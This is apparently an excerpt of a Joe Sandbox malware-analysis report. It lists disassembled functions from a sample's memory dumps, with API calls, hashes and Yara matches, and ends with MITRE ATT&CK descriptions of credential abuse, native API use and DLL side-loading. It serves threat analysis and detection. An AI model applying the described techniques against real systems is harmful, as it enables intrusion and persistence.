Associated: 00000000.00000002.3884070020.0000000003AE1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE3000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a90000_2HSalvXIJE.jbxd

Yara matches

Similarity

API ID: AttributeHeapInitializeListProcThread$AllocProcess
String ID:
API String ID: 1212816094-0
Opcode ID: 092ee1049558447ca0759a62b312a2f8f202331ccdb130be8b8fda5f5e098b35
Instruction ID: 66cd1fa73f5e6a188ab932502bff01408743b6de9b1f732973bb361752b1b465
Opcode Fuzzy Hash: 092ee1049558447ca0759a62b312a2f8f202331ccdb130be8b8fda5f5e098b35
Instruction Fuzzy Hash: 7FF09636724A4082DF55CB79E45476B63A4EBC9B90F58682ABA4B43714DE3DC1858A00

Function 03AAF098 Relevance: 6.0, APIs: 4, Instructions: 15COMMON

Download Yara Rule

APIs

closesocket.WS2_32 ref: 03AAF0A4
free.LIBCMT ref: 03AAF0AE

Part of subcall function 03AAF244: HeapFree.KERNEL32 ref: 03AAF25A
Part of subcall function 03AAF244: _errno.LIBCMT ref: 03AAF264
Part of subcall function 03AAF244: GetLastError.KERNEL32 ref: 03AAF26C

free.LIBCMT ref: 03AAF0B7
free.LIBCMT ref: 03AAF0C0

Memory Dump Source

Source File: 00000000.00000002.3884070020.0000000003A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A90000, based on PE: true

Associated: 00000000.00000002.3884070020.0000000003AD8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE3000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a90000_2HSalvXIJE.jbxd

Yara matches

Similarity

API ID: free$ErrorFreeHeapLast_errnoclosesocket
String ID:
API String ID: 1525665891-0
Opcode ID: 514671407b84a75ab4a957943dd5047acaa779434bbb8d29509bbfd64e64c7a5
Instruction ID: 2a28fdd6f6c5780327899364b4d06d0b6cc06cb812c467740996f64fb0612f78
Opcode Fuzzy Hash: 514671407b84a75ab4a957943dd5047acaa779434bbb8d29509bbfd64e64c7a5
Instruction Fuzzy Hash: 14D0672B71094485DF2CEBB6DDA52281320E798F95B1414228E5F4B364CE68C899C344

Function 00401FD0 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 209COMMON

Download Yara Rule

Strings

Unknown pseudo relocation bit size %d., xrefs: 00402294
Unknown pseudo relocation protocol version %d., xrefs: 004022A8

Memory Dump Source

Source File: 00000000.00000002.3883643343.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3883624426.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3883676568.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3883695881.0000000000405000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3883714058.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2HSalvXIJE.jbxd

Similarity

API ID:
String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.
API String ID: 0-395989641
Opcode ID: 8caf0c066df89f6cee4c07a50155e792156557ee52966e310dcb16b3cca200fb
Instruction ID: 42e0c3400c77c9dd47adb4fdb8995eb2357067ceb312bbd9be83e7c2f840df7f
Opcode Fuzzy Hash: 8caf0c066df89f6cee4c07a50155e792156557ee52966e310dcb16b3cca200fb
Instruction Fuzzy Hash: 6A712272B10B9486DF10CF61DA0875A7761FB58BA8F58862ADF08377E8DB7DC540CA08

Function 00401DC0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 109COMMON

Download Yara Rule

APIs

VirtualQuery.KERNEL32 ref: 00401E69

Strings

Address %p has no image-section, xrefs: 00401DC0, 00401FA5
VirtualQuery failed for %d bytes at address %p, xrefs: 00401FBB

Memory Dump Source

Source File: 00000000.00000002.3883643343.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3883624426.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3883676568.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3883695881.0000000000405000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3883714058.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2HSalvXIJE.jbxd

Similarity

API ID: QueryVirtual
String ID: VirtualQuery failed for %d bytes at address %p$Address %p has no image-section
API String ID: 1804819252-157664173
Opcode ID: 24b42db9420a0036ba5551ca2cf6389df1f73159e8ba1386f4a30517d06c5471
Instruction ID: 52aafb0f448170306d42bca5540912cc2139dda9d14def77d71a33c16101a6f6
Opcode Fuzzy Hash: 24b42db9420a0036ba5551ca2cf6389df1f73159e8ba1386f4a30517d06c5471
Instruction Fuzzy Hash: 4B31E3B3702A4195EF118F12EA4175A3761BB95BA4F49413AEF4C273A1EF3CD486C788

Function 036AECA7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 69COMMON

Download Yara Rule

APIs

_errno.LIBCMT ref: 036AECF8

Part of subcall function 036B115F: _getptd_noexit.LIBCMT ref: 036B1163

_invalid_parameter_noinfo.LIBCMT ref: 036AED03

Strings

B, xrefs: 036AED2F

Memory Dump Source

Source File: 00000000.00000002.3883926940.0000000003690000.00000040.00001000.00020000.00000000.sdmp, Offset: 03690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3690000_2HSalvXIJE.jbxd

Yara matches

Similarity

API ID: _errno_getptd_noexit_invalid_parameter_noinfo
String ID: B
API String ID: 1812809483-1255198513
Opcode ID: c02d2d703cad3fde31994e70e132d1470a84cf0b2fdde3fa0011d2dc5e3ae6ea
Instruction ID: 8736d38470a76ff1d39c3bd8eb4809ac2a79f7004f394459860bcfb6f41f68c1
Opcode Fuzzy Hash: c02d2d703cad3fde31994e70e132d1470a84cf0b2fdde3fa0011d2dc5e3ae6ea
Instruction Fuzzy Hash: 0311C130218F084FC744EF1CD485765B7E2FB98324F1047AEA419C72A0CB74C984CB86

Function 03AAF860 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 03AAF8B1

Part of subcall function 03AB1D18: _getptd_noexit.LIBCMT ref: 03AB1D1C

_invalid_parameter_noinfo.LIBCMT ref: 03AAF8BC

Strings

B, xrefs: 03AAF8E8

Memory Dump Source

Source File: 00000000.00000002.3884070020.0000000003A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A90000, based on PE: true

Associated: 00000000.00000002.3884070020.0000000003AD8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE3000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a90000_2HSalvXIJE.jbxd

Yara matches

Similarity

API ID: _errno_getptd_noexit_invalid_parameter_noinfo
String ID: B
API String ID: 1812809483-1255198513
Opcode ID: c02d2d703cad3fde31994e70e132d1470a84cf0b2fdde3fa0011d2dc5e3ae6ea
Instruction ID: 6969c27f69edb3b6cc8a95903900a4542525b259de880f11f4a88ffd29d566f0
Opcode Fuzzy Hash: c02d2d703cad3fde31994e70e132d1470a84cf0b2fdde3fa0011d2dc5e3ae6ea
Instruction Fuzzy Hash: 7D018B72620B408ADB14DB16E840399B764F798FE4FA84326AF580BBA5CF38C241CB00

Function 00401C40 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 38COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 00401CC0

Strings

_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00401CA7
Unknown error, xrefs: 00401D2C

Memory Dump Source

Source File: 00000000.00000002.3883643343.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3883624426.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3883676568.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3883695881.0000000000405000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3883714058.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2HSalvXIJE.jbxd

Similarity

API ID: fprintf
String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-3474627141
Opcode ID: d6c75893a8b8cdba1cdccd7648c7c79805f69453ca37c984926281bf3413687d
Instruction ID: 8762e6e2ae6541d4c7c6524eaf70c560080aac858bcbb5099d5ba83032827fc6
Opcode Fuzzy Hash: d6c75893a8b8cdba1cdccd7648c7c79805f69453ca37c984926281bf3413687d
Instruction Fuzzy Hash: 1E016163D18F88C2D6018F18E8003AB7331FB6E749F259316EB8C3A565DB79D592C704

Function 00401CE0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 00401CC0

Strings

_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00401CA7
Argument domain error (DOMAIN), xrefs: 00401CE0

Memory Dump Source

Source File: 00000000.00000002.3883643343.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3883624426.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3883676568.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3883695881.0000000000405000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3883714058.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2HSalvXIJE.jbxd

Similarity

API ID: fprintf
String ID: Argument domain error (DOMAIN)$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-2713391170
Opcode ID: 1d2f049123975630175d9b48e20279646fed079e7b419bc05d7036498ca68734
Instruction ID: 8c7bf1553abe8d1c1cf5b10b417118f64097995adaaa4f0d994d3f7e231e07fb
Opcode Fuzzy Hash: 1d2f049123975630175d9b48e20279646fed079e7b419bc05d7036498ca68734
Instruction Fuzzy Hash: ECF06D62858E8882D2029F1CE4003AB7331FB9EB88F28531AEF8D3A155DB28D5828704

Function 00401CF0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 00401CC0

Strings

_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00401CA7
Partial loss of significance (PLOSS), xrefs: 00401CF0

Memory Dump Source

Source File: 00000000.00000002.3883643343.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3883624426.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3883676568.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3883695881.0000000000405000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3883714058.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2HSalvXIJE.jbxd

Similarity

API ID: fprintf
String ID: Partial loss of significance (PLOSS)$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-4283191376
Opcode ID: 7751c0dc0e5f4d0d5a77e2b05341f0464b5ada29b978619af56a2b80f2ae8e47
Instruction ID: 5cd091db9141fe0e6e89e9efff11c316d26cc63b3b889972c32c6c159b948a40
Opcode Fuzzy Hash: 7751c0dc0e5f4d0d5a77e2b05341f0464b5ada29b978619af56a2b80f2ae8e47
Instruction Fuzzy Hash: C4F06262858E8882D2029F1CE4003AB7331FB5E788F245316EF8D3A555DB28D5828704

Function 00401D00 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 00401CC0

Strings

_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00401CA7
Overflow range error (OVERFLOW), xrefs: 00401D00

Memory Dump Source

Source File: 00000000.00000002.3883643343.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3883624426.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3883676568.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3883695881.0000000000405000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3883714058.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2HSalvXIJE.jbxd

Similarity

API ID: fprintf
String ID: Overflow range error (OVERFLOW)$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-4064033741
Opcode ID: 2da7071e0933fc8cd59be707335068b51f9eec2d662f944c6a91e8b8bb5ba5d0
Instruction ID: c612fb770c622c5d72669c3638e63aa4b2f428d8e56e9d424d6433c91b575293
Opcode Fuzzy Hash: 2da7071e0933fc8cd59be707335068b51f9eec2d662f944c6a91e8b8bb5ba5d0
Instruction Fuzzy Hash: 6FF01D62958E8882D2029F1DE4003AB7331FB9EB99F68531AEF8D3A555DB29D5828704

Function 00401D10 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 00401CC0

Strings

_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00401CA7
The result is too small to be represented (UNDERFLOW), xrefs: 00401D10

Memory Dump Source

Source File: 00000000.00000002.3883643343.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3883624426.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3883676568.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3883695881.0000000000405000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3883714058.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2HSalvXIJE.jbxd

Similarity

API ID: fprintf
String ID: The result is too small to be represented (UNDERFLOW)$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-2187435201
Opcode ID: 20ed77b3cd1f5ce30684c910d9c1ef4ed1bc2c10df881c0e026ae3cc509b1426
Instruction ID: abe9318e7ccd880ee09ac2f980ce11207d3172f5f88a25f0641f3127fee3ffee
Opcode Fuzzy Hash: 20ed77b3cd1f5ce30684c910d9c1ef4ed1bc2c10df881c0e026ae3cc509b1426
Instruction Fuzzy Hash: 77F06D62858E8882D2029F1DE4003AB7331FB9EB88F28531AEF8D3A155DB28D5828704

Function 00401D20 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 00401CC0

Strings

Total loss of significance (TLOSS), xrefs: 00401D20
_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00401CA7

Memory Dump Source

Source File: 00000000.00000002.3883643343.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3883624426.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3883676568.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3883695881.0000000000405000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3883714058.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2HSalvXIJE.jbxd

Similarity

API ID: fprintf
String ID: Total loss of significance (TLOSS)$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-4273532761
Opcode ID: 2868899dc0ce06e4a194e0e488d1f1fc1f92f94880d84b2dd2216e23dea375c1
Instruction ID: 7a53e470b351231260d633d6082b1e766a8645853782131be27a1b39d9499402
Opcode Fuzzy Hash: 2868899dc0ce06e4a194e0e488d1f1fc1f92f94880d84b2dd2216e23dea375c1
Instruction Fuzzy Hash: 52F01262958E8882D2029F1DE4003AB7331FB9E799F245316EF8D3A555DB39D5828704

Function 00401C78 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 00401CC0

Strings

_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00401CA7
Argument singularity (SIGN), xrefs: 00401C78

Memory Dump Source

Source File: 00000000.00000002.3883643343.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3883624426.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3883676568.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3883695881.0000000000405000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3883714058.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2HSalvXIJE.jbxd

Similarity

API ID: fprintf
String ID: Argument singularity (SIGN)$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-2468659920
Opcode ID: bfa7157af2bfae74903953b95ccb901f8d552bd3022b870c14073aba30280489
Instruction ID: b6e0ecebc6e2091bb6bcdfd9ecb9f8b620cfa756c99f7cd1274eda0ebaf44184
Opcode Fuzzy Hash: bfa7157af2bfae74903953b95ccb901f8d552bd3022b870c14073aba30280489
Instruction Fuzzy Hash: CBF03062954F8882D202DF2DE4003AB7331FB5EB9DF649316EF8D3A555DB29D5828704

Function 03A91CC4 Relevance: 5.3, APIs: 4, Instructions: 261COMMONLIBRARYCODE

Download Yara Rule

APIs

calloc.LIBCMT ref: 03A91D6A

Part of subcall function 03ABEE08: _calloc_impl.LIBCMT ref: 03ABEE18
Part of subcall function 03ABEE08: _errno.LIBCMT ref: 03ABEE2B
Part of subcall function 03ABEE08: _errno.LIBCMT ref: 03ABEE35

free.LIBCMT ref: 03A91EF3
free.LIBCMT ref: 03A91EFD
free.LIBCMT ref: 03A91F0F

Memory Dump Source

Source File: 00000000.00000002.3884070020.0000000003A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A90000, based on PE: true

Associated: 00000000.00000002.3884070020.0000000003AD8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE3000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a90000_2HSalvXIJE.jbxd

Yara matches

Similarity

API ID: free$_errno$_calloc_implcalloc
String ID:
API String ID: 4000150058-0
Opcode ID: 098b9973f943fd418b7180529354ef0ede5274538db457ffc537a6b083c63ad8
Instruction ID: 6452ba4dcbf6458b59b4c5dfb138fd5893810f3dc5b4eb58198fdb2001c11863
Opcode Fuzzy Hash: 098b9973f943fd418b7180529354ef0ede5274538db457ffc537a6b083c63ad8
Instruction Fuzzy Hash: EFC11D76604B858AEB64CF66E48079E77F8F788B88F14412AEB8D57B18DF38C555CB00

Function 036AA18B Relevance: 5.2, APIs: 4, Instructions: 226COMMONLIBRARYCODE

Download Yara Rule

APIs

malloc.LIBCMT ref: 036AA1BF

Part of subcall function 036AE6CB: _FF_MSGBANNER.LIBCMT ref: 036AE6FB
Part of subcall function 036AE6CB: _NMSG_WRITE.LIBCMT ref: 036AE705
Part of subcall function 036AE6CB: _callnewh.LIBCMT ref: 036AE739
Part of subcall function 036AE6CB: _errno.LIBCMT ref: 036AE744
Part of subcall function 036AE6CB: _errno.LIBCMT ref: 036AE74F

free.LIBCMT ref: 036AA306
free.LIBCMT ref: 036AA36A
free.LIBCMT ref: 036AA376

Memory Dump Source

Source File: 00000000.00000002.3883926940.0000000003690000.00000040.00001000.00020000.00000000.sdmp, Offset: 03690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3690000_2HSalvXIJE.jbxd

Yara matches

Similarity

API ID: free$_errno$_callnewhmalloc
String ID:
API String ID: 2761444284-0
Opcode ID: 220d10eecca3932b28677e19a5d899b4e1de467fae96e5e6bbac4d4284393be2
Instruction ID: 26184167a1d7088c40ddfead0b5c363c8b0dba8d3d5ab94fd482d88ee2ef0f8c
Opcode Fuzzy Hash: 220d10eecca3932b28677e19a5d899b4e1de467fae96e5e6bbac4d4284393be2
Instruction Fuzzy Hash: 3C51A134218F194BDB18EB6CD89467D73E2FB88310F140A6ED84BC7255EE34DC568B8A

Function 03693747 Relevance: 5.2, APIs: 4, Instructions: 179COMMONLIBRARYCODE

Download Yara Rule

APIs

malloc.LIBCMT ref: 036937AA

Memory Dump Source

Source File: 00000000.00000002.3883926940.0000000003690000.00000040.00001000.00020000.00000000.sdmp, Offset: 03690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3690000_2HSalvXIJE.jbxd

Yara matches

Similarity

API ID: malloc
String ID:
API String ID: 2803490479-0
Opcode ID: eb22e79342f6c44f5990d3d93bc1acaf377093f70efb3d4e41a798bd81bbd69f
Instruction ID: d425458b2798b79e8e806c4df140f432042bf9cdedeab32435d2d1e9d6436b4f
Opcode Fuzzy Hash: eb22e79342f6c44f5990d3d93bc1acaf377093f70efb3d4e41a798bd81bbd69f
Instruction Fuzzy Hash: 2A41C234618F054BEF18DF2CD98517A73E9FB8831072459AED89BC7346EE20EC168785

Function 03AAAD44 Relevance: 5.2, APIs: 4, Instructions: 155COMMONLIBRARYCODE

Download Yara Rule

APIs

malloc.LIBCMT ref: 03AAAD78

Part of subcall function 03AAF284: _FF_MSGBANNER.LIBCMT ref: 03AAF2B4
Part of subcall function 03AAF284: _NMSG_WRITE.LIBCMT ref: 03AAF2BE
Part of subcall function 03AAF284: HeapAlloc.KERNEL32 ref: 03AAF2D9
Part of subcall function 03AAF284: _callnewh.LIBCMT ref: 03AAF2F2
Part of subcall function 03AAF284: _errno.LIBCMT ref: 03AAF2FD
Part of subcall function 03AAF284: _errno.LIBCMT ref: 03AAF308

free.LIBCMT ref: 03AAAEBF
free.LIBCMT ref: 03AAAF23
free.LIBCMT ref: 03AAAF2F

Memory Dump Source

Source File: 00000000.00000002.3884070020.0000000003A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A90000, based on PE: true

Associated: 00000000.00000002.3884070020.0000000003AD8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE3000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a90000_2HSalvXIJE.jbxd

Yara matches

Similarity

API ID: free$_errno$AllocHeap_callnewhmalloc
String ID:
API String ID: 3531731211-0
Opcode ID: 12a82f6075b3f1b1b37aa8f48911ccb92805a6f06572296fb4e409a8028c0c4a
Instruction ID: bea9edbf364a28c5da243e7447a553ae597e2dcda5fa754ddaf406e2c65226ec
Opcode Fuzzy Hash: 12a82f6075b3f1b1b37aa8f48911ccb92805a6f06572296fb4e409a8028c0c4a
Instruction Fuzzy Hash: 6B51E17A300B4546DE2CEB29DA5036EB3A9FB80B80F48082BDE5A1BB54EF79C105C700

Function 03A94300 Relevance: 5.1, APIs: 4, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

malloc.LIBCMT ref: 03A94363

Memory Dump Source

Source File: 00000000.00000002.3884070020.0000000003A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A90000, based on PE: true

Associated: 00000000.00000002.3884070020.0000000003AD8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE3000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a90000_2HSalvXIJE.jbxd

Yara matches

Similarity

API ID: malloc
String ID:
API String ID: 2803490479-0
Opcode ID: 1a29f9ba763a41af98fc3daf4a760b7fafa00e022ffdaa07ef0aba0b6fdaf4ad
Instruction ID: 6ddfe1a179403afbdee0b11b9c66380ac0312c27ce99e1d79645f7b09935fd84
Opcode Fuzzy Hash: 1a29f9ba763a41af98fc3daf4a760b7fafa00e022ffdaa07ef0aba0b6fdaf4ad
Instruction Fuzzy Hash: FC418C3630478187EF18DB27A95066E77E5F788B88F48452BDE6A5BB04EF38D806C700

Function 03AA1038 Relevance: 5.1, APIs: 4, Instructions: 109COMMON

Download Yara Rule

APIs

Part of subcall function 03AA9170: GetCurrentProcess.KERNEL32 ref: 03AA9188

GetLastError.KERNEL32 ref: 03AA10A7
malloc.LIBCMT ref: 03AA113C
free.LIBCMT ref: 03AA1185
GetLastError.KERNEL32 ref: 03AA11B5

Memory Dump Source

Source File: 00000000.00000002.3884070020.0000000003A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A90000, based on PE: true

Associated: 00000000.00000002.3884070020.0000000003AD8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE3000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a90000_2HSalvXIJE.jbxd

Yara matches

Similarity

API ID: ErrorLast$CurrentProcessfreemalloc
String ID:
API String ID: 1397824077-0
Opcode ID: cf62d47a1d5fdb9c876962cfa4c676d021a3fa8d1c8180fd698ba2a0010a64ef
Instruction ID: 0a532057c702c8fe04d805ae2b051a422d6b33e829eae1565aa83f699e4267bd
Opcode Fuzzy Hash: cf62d47a1d5fdb9c876962cfa4c676d021a3fa8d1c8180fd698ba2a0010a64ef
Instruction Fuzzy Hash: 61415177314B9196DB24DB2AE94076FA7A5EB84788F00542BAF898BB48EF3DC1458700

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
